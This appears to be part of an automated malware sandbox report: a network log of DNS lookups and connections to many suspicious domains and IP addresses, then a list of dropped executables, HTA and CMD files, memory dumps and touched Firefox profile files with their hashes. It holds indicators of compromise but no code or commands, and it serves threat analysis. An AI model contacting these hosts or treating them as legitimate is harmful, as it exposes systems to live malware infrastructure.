US 104.21.64.1:443 exarthynature.run tcp
US 104.21.64.1:443 exarthynature.run tcp
US 104.21.64.1:443 exarthynature.run tcp
US 104.21.64.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.64.1:443 croprojegies.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.64.1:443 croprojegies.run tcp
US 104.21.64.1:443 croprojegies.run tcp
US 104.21.64.1:443 croprojegies.run tcp
US 104.21.64.1:443 croprojegies.run tcp
US 104.21.64.1:443 croprojegies.run tcp
RU 45.93.20.28:80 45.93.20.28 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
N/A 127.0.0.1:54822 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com tcp
N/A 127.0.0.1:54831 tcp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.206:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.187.206:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
NL 2.18.121.73:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 play.google.com udp
US 150.171.27.10:443 g.bing.com tcp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 104.21.24.225:443 farmingtzricks.top tcp
DE 5.75.210.149:443 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 172.67.189.66:443 moderzysics.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp

Files

memory/1284-0-0x0000000000110000-0x000000000041D000-memory.dmp

memory/1284-1-0x0000000077C94000-0x0000000077C96000-memory.dmp

memory/1284-2-0x0000000000111000-0x0000000000171000-memory.dmp

memory/1284-3-0x0000000000110000-0x000000000041D000-memory.dmp

memory/1284-4-0x0000000000110000-0x000000000041D000-memory.dmp

memory/1284-5-0x0000000000110000-0x000000000041D000-memory.dmp

memory/1284-6-0x0000000000110000-0x000000000041D000-memory.dmp

memory/1284-7-0x0000000000111000-0x0000000000171000-memory.dmp

memory/1284-8-0x0000000000110000-0x000000000041D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe

MD5 1565063ca3d43812789fbf960418659e
SHA1 d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256 c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512 eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42

memory/1284-15-0x0000000000110000-0x000000000041D000-memory.dmp

memory/2892-13-0x0000000000860000-0x0000000000D1C000-memory.dmp

memory/2892-16-0x0000000000861000-0x000000000088F000-memory.dmp

memory/2892-17-0x0000000000860000-0x0000000000D1C000-memory.dmp

memory/2892-19-0x0000000000860000-0x0000000000D1C000-memory.dmp

memory/2892-29-0x0000000000860000-0x0000000000D1C000-memory.dmp

memory/4276-31-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4276-32-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4276-33-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4276-35-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4276-34-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/2976-37-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4276-38-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4276-39-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe

MD5 07164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1 d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA256 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA512 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9

C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta

MD5 fdb4ece761622fc23546239dca7749e9
SHA1 37203f5687a548f563a83bc20532e633780cb69d
SHA256 08d168f25a38424c1c95a2c632855df9629d122c6b0a8f55485f8b48b00a19b2
SHA512 74c583d9301f7c8b36c4bbdfe7845ef7672a10de2529d90b4f5a60dd63e22cac6d5793e443986d05feaa29178bf09ec4847469d8dbc4d9a5d0904a3c2af4fae6

memory/868-59-0x00000000025F0000-0x0000000002626000-memory.dmp

memory/868-60-0x00000000052C0000-0x00000000058E8000-memory.dmp

memory/868-61-0x0000000004F80000-0x0000000004FA2000-memory.dmp

memory/868-62-0x0000000005220000-0x0000000005286000-memory.dmp

memory/868-63-0x00000000058F0000-0x0000000005956000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_503o0ga1.lyw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/868-73-0x0000000005960000-0x0000000005CB4000-memory.dmp

memory/868-74-0x0000000005F40000-0x0000000005F5E000-memory.dmp

memory/868-75-0x0000000005F60000-0x0000000005FAC000-memory.dmp

memory/4276-76-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4276-77-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/868-78-0x0000000007660000-0x0000000007CDA000-memory.dmp

memory/868-79-0x0000000006440000-0x000000000645A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 606e85c5d2b3250659d1d32ce0235e39
SHA1 0d058a45f4caaa69b5bef5d19366fdb0545621aa
SHA256 2cb585840929e762f092d274dab676cc23954742143959e934043499bc6f0102
SHA512 6f0f5101027f041c45da3929ff1e174046de5b149ded799b2543d1198418e0b6172bd2073e063476063fea722f4ccf5d027fd4cd5b0c09ea085aebb3828a3275

memory/868-114-0x0000000007400000-0x0000000007496000-memory.dmp

memory/868-115-0x0000000007390000-0x00000000073B2000-memory.dmp

memory/868-116-0x0000000008290000-0x0000000008834000-memory.dmp

memory/3780-124-0x0000000000460000-0x000000000091C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 19778ac0ed7df6211b6d5c869db2b990
SHA1 80d3a35e91e7439a3caed7248b6302cd6a954792
SHA256 f62aea1294114defddfd7f5978103ab0ede9b085c5a0d46a9854e1558eb5a3e9
SHA512 fd2fe68865a85f0bba9d10c10bce58451b1639ccb0140657d6a120aed27efcc899704824ce75be169af37677b5b0d80851ee8cad0c993af3bbe5b65382525ecb

memory/404-137-0x0000000006160000-0x00000000064B4000-memory.dmp

memory/3780-140-0x0000000000460000-0x000000000091C000-memory.dmp

memory/404-141-0x0000000006870000-0x00000000068BC000-memory.dmp

C:\Temp\iH0BXcodL.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/3640-149-0x0000000006080000-0x00000000063D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c7682eafc09050ce3e588317d4aca1ea
SHA1 47adc89821a0ee7deac76c16ba4b4b4e2c8baf5c
SHA256 5b340ed4f01f8f7d2b65b4672a1e222c00954646134b7c6ff616d1ca4e556b63
SHA512 dcab48f5ae964b59c4f1d01c8fc31b137aceceb90536971ced2f6ddcb2ddd4589feac6f18e0ef6e276c7d31caf0090ac0a10cdbd96aab333135aead0accb6804

memory/3640-155-0x0000000006780000-0x00000000067CC000-memory.dmp

memory/4276-156-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/860-171-0x0000000000710000-0x00000000010FD000-memory.dmp

memory/916-180-0x0000000000110000-0x00000000005CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/1480-199-0x0000000000450000-0x00000000004C8000-memory.dmp

memory/1712-201-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1712-203-0x0000000000400000-0x0000000000465000-memory.dmp

memory/916-205-0x0000000000110000-0x00000000005CC000-memory.dmp

memory/4276-206-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/860-207-0x0000000000710000-0x00000000010FD000-memory.dmp

memory/860-208-0x0000000000710000-0x00000000010FD000-memory.dmp

memory/3308-209-0x0000000000400000-0x000000000042F000-memory.dmp

memory/3308-211-0x0000000000400000-0x000000000042F000-memory.dmp

memory/860-212-0x0000000000710000-0x00000000010FD000-memory.dmp

memory/3308-216-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe

MD5 84ada09d9801547265d6589b50051295
SHA1 fa842424381715851e8d8d716afb27da31edd8c1
SHA256 a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6
SHA512 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f

memory/4352-234-0x0000000000290000-0x0000000000EC3000-memory.dmp

memory/4276-236-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZWLN2AM0\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe

MD5 5af71429b3b21c4ecb55d948a04f92a0
SHA1 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256 b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512 a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827

memory/2724-253-0x00000000009A0000-0x0000000000E35000-memory.dmp

memory/4352-289-0x0000000000290000-0x0000000000EC3000-memory.dmp

memory/4276-290-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4352-291-0x0000000000290000-0x0000000000EC3000-memory.dmp

memory/2724-292-0x00000000009A0000-0x0000000000E35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe

MD5 30305d29528f3aca3b09636d919bd512
SHA1 4af875a29e249da70f2da3519334af8fd584c193
SHA256 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e
SHA512 a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4

memory/3620-302-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4352-304-0x0000000000290000-0x0000000000EC3000-memory.dmp

memory/4240-312-0x0000000000590000-0x000000000089A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe

MD5 afc954940e0fc5ca6bdf390e0033a01c
SHA1 aa0193bc48197c86a7ce3401be6607f0e052a319
SHA256 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512 b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148

memory/2236-338-0x00000000004E0000-0x0000000000B68000-memory.dmp

memory/2236-341-0x00000000004E0000-0x0000000000B68000-memory.dmp

memory/4276-342-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4656-346-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4240-345-0x0000000000590000-0x000000000089A000-memory.dmp

memory/4656-348-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4240-349-0x0000000000590000-0x000000000089A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe

MD5 08552f5efe19801cc3fafe356dccd710
SHA1 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA256 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA512 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d

memory/4276-372-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/4240-375-0x0000000000590000-0x000000000089A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp

MD5 1cb5707b6b6cf1843bd7d3d1c907cd9c
SHA1 6a6d04cc8f62e1740b6a5bf5a1fa60c3fde03a84
SHA256 445e494674412290f8ff48ba2c9d6fec51f824c18841c89d7b5fa6f982b00ce6
SHA512 056c0624169de5ffe4b184d14876e7f43cfd80ce29f67aa95612bec9a0e19bbd99be9609531fa583ee00609917ed2a3ad2eb08ddd4704d0a82f7ea157ec4cf3a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\06b63187-23ff-4a9a-8323-e910eff6e7ce

MD5 13a0d9e7633343e674c11544331374b1
SHA1 7e30b7ce662b7823271f044525abc0da30ec02e2
SHA256 f7e8cf1b4318e92f2839257a61661267bd7e731f23a7883f5b9898923eb5ccb6
SHA512 0e767e5434af893931d1559bee83d143e02dbae1059f1175bbc0eecd69fe3ef008b1230c5b2aff8e27f7a9f598efe25eeded18e16a6303f8f9c70a1a01f86ec6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\a234fd4a-c802-4e4f-8cf6-7837f8b68b94

MD5 cb9c380d1a5fb6e540219eb43956179a
SHA1 f6834adb4c3f3981ef94bc00e612f82e841ba268
SHA256 8c09093b9d430f355c488a820c03a409a296ba20d940952b1a9a623e031912d1
SHA512 51af0bc90e91dcbdf3097c09f398a7609fffcb3a4078ca34aef17b56e350cfd6c8a73a3cc372520e70bdf78cb4dcfff212a7a4cc2f004dcdbc9c38779b62f40d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp

MD5 f5d06bb4feb7525dce73261a5b3ec965
SHA1 98b569bdcc14016ec347739f61149e78450cba61
SHA256 4c1f593dd218d45752c89e85f5e74516ff3f4d320c4f6ac927f565a95c0d68bc
SHA512 c968ae16c97b9eca95faac41dde2320974099c460d48c1600681a0e0feb47dd441446a5a468fd134e515cf5f76abc9c8ac1370d5b9544f7f529a589f66f15d90

memory/4240-597-0x0000000000590000-0x000000000089A000-memory.dmp

memory/5912-599-0x00000000006A0000-0x0000000000B5C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs.js

MD5 ce65d94448e93dbde53b62c6fc805416
SHA1 50305e8e9803aaa4a0cc9ec0d6ccc67e93e046fd
SHA256 084898110c96f2cdbc424236922fd422a261166e3534594c58fc747ab6ed136e
SHA512 67fc2caed3a998afd8b9fab30d1f7cbc1fb0e6926b3e743d2b8d298ce94e0816c4fd1e5eee51670187fdcec3aac8dc67d93e8578902a7a4ddd4dd1cd5d22708b

memory/5912-614-0x00000000006A0000-0x0000000000B5C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin

MD5 fdeab0a95a1ea63e5b5f2f0afef8fa6c
SHA1 9f531048a687f0d9b2905208610bc3040515e985
SHA256 9555968dfd6a82604a4c943ab49e1cc6cd83ae4b12ae4cc7272f067736e0b5cf
SHA512 29cf0af6d47bcd9b701b3c3019f573f9afd52ce31064ff04520009cf16c59f6de758b5c5f092b6d1a5bf059a153142ae41f41aae11351009e5130aa39dc785ba

memory/4276-725-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/1836-745-0x0000000000970000-0x0000000000DBE000-memory.dmp

memory/1836-747-0x0000000000970000-0x0000000000DBE000-memory.dmp

memory/1836-746-0x0000000000970000-0x0000000000DBE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\prefs-1.js

MD5 16bd85906df571b8e33d645944b2d502
SHA1 28530458a4e683aa5ec838882a249d418eced553
SHA256 97440130fde6dfa07ffc705ad1f91e8d1c5cc27d98a8e666c58fe9c40a9bd629
SHA512 31a7e208b3a833ae28046e7d21ada604b5ffce4171c174539a7cee4ae5d2544b83c75f3a537fa5f0b2cb09cad4add1e9434907eb4c312c315313b26d1c715a4b

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AZ1RNKT0\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\Desktop\YCL.lnk

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/4276-826-0x0000000000520000-0x00000000009DC000-memory.dmp

memory/1836-828-0x0000000000970000-0x0000000000DBE000-memory.dmp

memory/1836-835-0x0000000000970000-0x0000000000DBE000-memory.dmp

memory/4276-840-0x0000000000520000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/3820-858-0x00000000007B0000-0x0000000000E9E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp

MD5 5b76cbbb82694edd0c611cb130987872
SHA1 449401ec72a2c40dfb35acade29fbfe417de8836
